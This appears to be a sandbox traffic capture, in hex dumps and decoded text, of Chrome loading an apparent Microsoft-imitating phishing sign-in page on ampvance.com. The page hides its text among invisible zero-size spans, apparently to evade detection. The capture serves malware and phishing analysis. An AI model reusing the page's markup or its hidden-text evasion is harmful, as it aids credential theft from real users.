                                                      2024-03-05 13:23:44 UTC677INData Raw: 34 64 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69
                                                      Data Ascii: 4d6<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helveti
                                                      2024-03-05 13:23:44 UTC568INData Raw: 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20
                                                      Data Ascii: ver!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255,
                                                      2024-03-05 13:23:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      36192.168.2.449783172.67.165.1054434632C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:23:44 UTC553OUTGET /1 HTTP/1.1
                                                      Host: ampvance.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: cf_clearance=zNVt0U8x.8JKRgLQLJnJkGAErXxNyurSQF3gQoUIwEc-1709644996-1.0.1.1-gHAxKV.yo7SftjLGjlI1Q8Q.ZH1wpfZpyri2AnVshTgmScC9Gx7nqU9IhT36ZZSGZo6ZyZOiuFN.V7jFZl3IEg; PHPSESSID=6aa1ef9bee6ad93645932d7f3602420d
                                                      2024-03-05 13:23:45 UTC734INHTTP/1.1 200 OK
                                                      Date: Tue, 05 Mar 2024 13:23:44 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                      cache-control: no-store, no-cache, must-revalidate
                                                      pragma: no-cache
                                                      vary: Accept-Encoding
                                                      x-turbo-charged-by: LiteSpeed
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NQ0lPLFRch1Nt5xxocerTdJ0w2MkQi7G3sjS0UMQCTUJpH%2FlLL0ptRnWgUp0CpA4aah6s%2BmnafiURRtdU3L0tXcyuLcmHd6Wnk0omseNapdvDeWlWFaZ%2BWMduQxaYuU%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6c1cff398ce0-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-03-05 13:23:45 UTC635INData Raw: 37 34 66 65 0d 0a 20 20 20 20 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 63 6c 61 73 73 3d 22 30 34 38 61 31 31 33 30 33 66 32 63 30 62 31 33 63 37 31 64 65 35 31 32 33 65 33 30 66 66 66 62 36 35 65 37 31 63 65 30 65 33 64 65 34 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 53 69 67 6e 20 69 6e 20 74 6f 20 74 68 65 20 42 65 73 74 20 50 72 6f 64 75 63 74 69 76 69 74 79 20 50 72 6f 76 69 64 65 72 21 20 20 20 20 20 20 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65
                                                      Data Ascii: 74fe <html dir="ltr" class="048a11303f2c0b13c71de5123e30fffb65e71ce0e3de4" lang="en"> <head> <title> Sign in to the Best Productivity Provider! </title> <meta http-equiv="Content-Type" content="text/html; charse
                                                      2024-03-05 13:23:45 UTC1369INData Raw: 33 65 33 30 66 66 66 62 36 35 65 37 31 63 65 30 65 33 64 65 39 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 0a 20 20 20 20 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 63 62 20 30 34 38 61 31 31 33 30 33 66 32 63 30 62 31 33 63 37 31 64 65 35 31 32 33 65 33 30 66 66 66 62 36 35 65 37 31 63 65 30 65 33 64 65 61 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 61 63 6b 67 72 6f 75 6e 64 20 30 34 38 61 31 31 33 30 33 66 32 63 30 62 31 33 63 37 31 64 65 35 31 32 33 65 33 30 66 66 66 62 36 35 65 37 31 63
                                                      Data Ascii: 3e30fffb65e71ce0e3de9" rel="stylesheet"> </head> <body class="cb 048a11303f2c0b13c71de5123e30fffb65e71ce0e3dea" style="display: block;"> <div> <div> <div class="background 048a11303f2c0b13c71de5123e30fffb65e71c
                                                      2024-03-05 13:23:45 UTC1369INData Raw: 66 30 37 30 63 65 36 66 62 36 36 61 66 36 35 62 34 35 39 30 33 62 38 62 39 39 64 63 65 36 35 65 37 31 63 65 30 65 33 64 66 64 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 75 74 65 72 20 30 34 38 61 31 31 33 30 33 66 32 63 30 62 31 33 63 37 31 64 65 35 31 32 33 65 33 30 66 66 66 62 36 35 65 37 31 63 65 30 65 33 64 66 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 69 64 64 6c 65 20 30 34 38 61 31 31 33 30 33 66 32 63 30 62 31 33 63 37 31 64 65 35 31 32 33 65 33 30 66 66 66 62 36 35 65 37 31 63 65 30 65 33 64 66 66 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                      Data Ascii: f070ce6fb66af65b45903b8b99dce65e71ce0e3dfd" autocomplete="off"> <div class="outer 048a11303f2c0b13c71de5123e30fffb65e71ce0e3dfe"> <div class="middle 048a11303f2c0b13c71de5123e30fffb65e71ce0e3dff">
                                                      2024-03-05 13:23:45 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 20 74 65 78 74 2d 74 69 74 6c 65 20 30 34 38 61 31 31 33 30 33 66 32 63 30 62 31 33 63 37 31 64 65 35 31 32 33 65 33 30 66 66 66 62 36 35 65 37 31 63 65 30 65 33 65 30 39 22 20 69 64 3d 22 6c 6f 67 69 6e 48 65 61 64 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 72 6f 6c 65 3d 22 68 65 61 64 69 6e 67 22 20 61 72 69 61 2d 6c 65 76 65 6c 3d 22 31 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                      Data Ascii: <div class="row text-title 048a11303f2c0b13c71de5123e30fffb65e71ce0e3e09" id="loginHeader"> <div role="heading" aria-level="1">
                                                      2024-03-05 13:23:45 UTC1369INData Raw: 20 75 73 65 72 6e 61 6d 65 2e 20 54 72 79 20 61 6e 6f 74 68 65 72 2c 20 6f 72 20 3c 61 20 69 64 3d 22 69 64 41 5f 50 57 44 5f 53 69 67 6e 55 70 22 20 68 72 65 66 3d 22 23 22 3e 67 65 74 20 61 20 6e 65 77 20 4d 69 63 72 6f 73 6f 66 74 20 61 63 63 6f 75 6e 74 3c 2f 61 3e 2e 3c 2f 64 69 76 3e 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 20 30 34 38 61 31 31 33 30 33 66 32 63 30 62 31 33 63 37 31 64 65 35 31 32 33 65 33 30 66 66 66 62 36 35 65 37 31 63 65 30 65 33 65 30 63 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                      Data Ascii: username. Try another, or <a id="idA_PWD_SignUp" href="#">get a new Microsoft account</a>.</div> --> <div class="row 048a11303f2c0b13c71de5123e30fffb65e71ce0e3e0c">
                                                      2024-03-05 13:23:45 UTC1369INData Raw: 6e 3e 20 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 41 3c 2f 73 70 61 6e 3e 76 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 41 3c 2f 73 70
                                                      Data Ascii: n> <span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">A</span>v<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">A</sp
                                                      2024-03-05 13:23:45 UTC1369INData Raw: 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 41 3c 2f 73 70 61 6e 3e 6c 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 41 3c 2f 73 70 61 6e 3e 20 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65
                                                      Data Ascii: ght: 0.03px; font-size: 0.02px;">A</span>l<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">A</span> <span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-he
                                                      2024-03-05 13:23:45 UTC1369INData Raw: 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 41 3c 2f 73 70 61 6e 3e 70 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 41 3c 2f 73 70 61 6e 3e 68 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20
                                                      Data Ascii: 25, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">A</span>p<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">A</span>h<span style="display: inline; color: rgba(26,
                                                      2024-03-05 13:23:45 UTC1369INData Raw: 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 41 3c 2f 73 70 61 6e 3e 72 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 41 3c 2f 73 70 61 6e 3e 2c 3c 73 70 61 6e 20 73
                                                      Data Ascii: yle="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">A</span>r<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">A</span>,<span s
                                                      2024-03-05 13:23:45 UTC1369INData Raw: 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 41 3c 2f 73 70 61 6e 3e 65 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 41 3c 2f 73 70 61 6e 3e 20 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70
                                                      Data Ascii: ; font-size: 0.02px;">A</span>e<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">A</span> <span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03p


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      37192.168.2.449787104.21.81.2294434632C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:23:44 UTC1199OUTGET /APP-048a11303f2c0b13c71de5123e30fffb65e71ce053bdc/048a11303f2c0b13c71de5123e30fffb65e71ce053bde HTTP/1.1
                                                      Host: ampvance.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      sec-ch-ua-full-version: "117.0.5938.132"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: text/css,*/*;q=0.1
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: style
                                                      Referer: https://ampvance.com/cf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93eLOGcf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93f
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: cf_clearance=zNVt0U8x.8JKRgLQLJnJkGAErXxNyurSQF3gQoUIwEc-1709644996-1.0.1.1-gHAxKV.yo7SftjLGjlI1Q8Q.ZH1wpfZpyri2AnVshTgmScC9Gx7nqU9IhT36ZZSGZo6ZyZOiuFN.V7jFZl3IEg; PHPSESSID=6aa1ef9bee6ad93645932d7f3602420d
                                                      2024-03-05 13:23:45 UTC733INHTTP/1.1 200 OK
                                                      Date: Tue, 05 Mar 2024 13:23:45 GMT
                                                      Content-Type: text/css
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cache-control: public, max-age=604800
                                                      expires: Tue, 12 Mar 2024 13:23:44 GMT
                                                      last-modified: Tue, 05 Mar 2024 10:40:37 GMT
                                                      vary: Accept-Encoding
                                                      x-turbo-charged-by: LiteSpeed
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jyrDVFvRICzWvQ%2F9DgCdhxPnbYoeFIpOUjJ8bRsJOawoOsolw9G4cMn7SHy7EGs90HMN3CwR2oIrCti00gpeT%2Be9OP5pf2qp9Xx9ZiFf2UH3RSXCt2tTOgygURze%2BGI%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6c1d3a36c343-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-03-05 13:23:45 UTC636INData Raw: 37 63 64 34 0d 0a 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 2d 6d 73 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 7d 61 72 74 69 63 6c 65 2c 61 73 69 64 65 2c 64 65 74 61 69 6c 73 2c 66 69 67 63 61 70 74 69 6f 6e 2c 66 69 67 75 72 65 2c 66 6f 6f 74 65 72 2c 68 65 61 64 65 72 2c 68 67 72 6f 75 70 2c 6d 61 69 6e 2c 6d 65 6e 75 2c 6e 61 76 2c 73 65 63 74 69 6f 6e 2c 73 75 6d 6d 61 72 79 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 61 75 64 69 6f 2c 63 61 6e 76 61 73 2c 70 72 6f 67 72 65 73 73 2c 76 69 64 65 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f
                                                      Data Ascii: 7cd4html{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}article,aside,details,figcaption,figure,footer,header,hgroup,main,menu,nav,section,summary{display:block}audio,canvas,progress,video{display:inline-blo
                                                      2024-03-05 13:23:45 UTC1369INData Raw: 65 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 7d 73 75 70 7b 74 6f 70 3a 2d 30 2e 35 65 6d 7d 73 75 62 7b 62 6f 74 74 6f 6d 3a 2d 30 2e 32 35 65 6d 7d 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 73 76 67 3a 6e 6f 74 28 3a 72 6f 6f 74 29 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 66 69 67 75 72 65 7b 6d 61 72 67 69 6e 3a 31 65 6d 20 34 30 70 78 7d 68 72 7b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 68 65 69 67 68 74 3a 30 7d 70 72 65 7b 6f 76 65 72 66 6c 6f 77 3a 61 75 74 6f 7d 63 6f 64 65 2c 6b 62 64 2c 70 72 65 2c 73 61 6d 70 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 6d 6f 6e 6f 73 70 61 63 65 2c 6d 6f 6e 6f 73 70 61
                                                      Data Ascii: e;vertical-align:baseline}sup{top:-0.5em}sub{bottom:-0.25em}img{border:0}svg:not(:root){overflow:hidden}figure{margin:1em 40px}hr{-moz-box-sizing:content-box;box-sizing:content-box;height:0}pre{overflow:auto}code,kbd,pre,samp{font-family:monospace,monospa
                                                      2024-03-05 13:23:45 UTC1369INData Raw: 72 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 2a 3a 62 65 66 6f 72 65 2c 2a 3a 61 66 74 65 72 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 69 6e 70 75 74 2c 62 75 74 74 6f 6e 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 68 65 72 69 74 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 61 3a 66 6f 63 75 73 7b 6f 75 74 6c 69 6e 65 3a 74 68 69 6e 20 64 6f 74 74 65 64 3b 6f 75 74 6c 69 6e 65 2d 6f 66 66 73 65 74 3a 2d
                                                      Data Ascii: r-box;box-sizing:border-box}*:before,*:after{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}input,button,select,textarea{font-family:inherit;font-size:inherit;line-height:inherit}a:focus{outline:thin dotted;outline-offset:-
                                                      2024-03-05 13:23:45 UTC1369INData Raw: 7d 61 3a 6c 69 6e 6b 7b 63 6f 6c 6f 72 3a 23 30 30 36 37 62 38 7d 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 36 37 62 38 7d 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 36 36 36 7d 61 3a 66 6f 63 75 73 7b 63 6f 6c 6f 72 3a 23 30 30 36 37 62 38 7d 61 3a 61 63 74 69 76 65 7b 63 6f 6c 6f 72 3a 23 39 39 39 7d 2e 74 65 78 74 2d 63 65 6e 74 65 72 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 74 65 78 74 2d 6a 75 73 74 69 66 79 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 6a 75 73 74 69 66 79 7d 2e 74 65 78 74 2d 6e 6f 77 72 61 70 7b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 2e 74 65 78 74 2d 6c 6f 77 65 72 63 61 73 65 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6c 6f 77 65 72 63 61 73 65 7d 2e 74 65 78 74 2d 75 70 70 65 72
                                                      Data Ascii: }a:link{color:#0067b8}a:visited{color:#0067b8}a:hover{color:#666}a:focus{color:#0067b8}a:active{color:#999}.text-center{text-align:center}.text-justify{text-align:justify}.text-nowrap{white-space:nowrap}.text-lowercase{text-transform:lowercase}.text-upper
